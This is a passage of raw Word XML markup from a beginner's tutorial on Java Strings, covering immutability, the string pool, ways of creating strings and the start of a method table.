        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In Java, String is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02459C1F" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is used to represent </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a sequence of characters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (text data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438302F0" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Immutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Once a String object is created, its value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot be changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4DCF98" w14:textId="09798578" w:rsidR="003F7F87" w:rsidRPr="00CE4B95" w:rsidRDefault="003F7F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6756352"/>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lice"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B003A7"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Here, name is a String object containing the text "Alice".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC3F743" w14:textId="77777777" w:rsidR="00B41C76" w:rsidRPr="00CE4B95" w:rsidRDefault="00B41C76" w:rsidP="00A4286A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E29B0A" w14:textId="3E1D86AA" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">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String is a Class (Not a Primitive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3062A447" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">String is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not a primitive type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like int, char, boolean)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534502DF" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reference type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but behaves like a basic data type due to special handling by the JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC2829C" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">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String is Immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626BE77C" w14:textId="77777777" w:rsidR="00442C48" w:rsidRPr="00CE4B95" w:rsidRDefault="00442C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16708"/>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Hello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C613A" w14:textId="77777777" w:rsidR="00442C48" w:rsidRPr="00CE4B95" w:rsidRDefault="00442C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16708"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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nca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 World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55454063" w14:textId="78938F4A" w:rsidR="00442C48" w:rsidRPr="00CE4B95" w:rsidRDefault="00442C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16708"/>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 Hello (not "Hello World")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49043CD0" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A new String is created internally, but s1 still points to the original "Hello".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429DD0BB" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For modifications, use StringBuilder or StringBuffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928C108" w14:textId="13E4AD55" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">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How Strings are Stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B81F538" w14:textId="0DB7A797" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool (String Interning):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DE02DA" w14:textId="77777777" w:rsidR="00442C48" w:rsidRPr="00CE4B95" w:rsidRDefault="00442C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887298"/>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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68202183" w14:textId="77777777" w:rsidR="00442C48" w:rsidRPr="00CE4B95" w:rsidRDefault="00442C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887298"/>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b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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6207B704" w14:textId="6DE58E64" w:rsidR="00442C48" w:rsidRPr="00CE4B95" w:rsidRDefault="00442C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887298"/>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rue (points to same object in string pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DF6FE" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Strings created with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>literals</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String constant pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B794AF5" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Helps in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F624C7C" w14:textId="2C87B329" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">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Ways to Create Strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8D088F" w14:textId="77777777" w:rsidR="00B226E4" w:rsidRPr="00CE4B95" w:rsidRDefault="00B226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348445"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// 1. Using literals (preferred)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598E2945" w14:textId="77777777" w:rsidR="00B226E4" w:rsidRPr="00CE4B95" w:rsidRDefault="00B226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348445"/>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tr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Hello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD2154E" w14:textId="77777777" w:rsidR="00B226E4" w:rsidRPr="00CE4B95" w:rsidRDefault="00B226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348445"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8837FD" w14:textId="77777777" w:rsidR="00B226E4" w:rsidRPr="00CE4B95" w:rsidRDefault="00B226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348445"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// 2. Using constructor (avoids pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A6783" w14:textId="7A9E58B4" w:rsidR="00B226E4" w:rsidRPr="00CE4B95" w:rsidRDefault="00B226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348445"/>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tr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ello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35078272" w14:textId="0169B419" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="00A4286A">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Common String Methods</w:t>
      </w:r>
      <w:r w:rsidR="00830868" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>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8"/>
        <w:gridCol w:w="3051"/>
      </w:tblGrid>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="077841DF" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C242128" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="0076381B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11190241" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="0076381B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="5FC448B0" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B83BBB7"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length()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C51BB1"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Returns the length</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="69291C72" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08257DA7"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charAt(index)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="215230DC"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Returns character at index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="0CA0D76F" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="693527EA"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equals()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3749286E"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Checks value equality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="163A175F" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11757E24"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lastRenderedPageBreak/>
              <w:t>==</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6374E31F"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Checks reference equality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000A485D" w:rsidRPr="00CE4B95" w14:paraId="555C7423" w14:textId="77777777" w:rsidTr="000A485D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
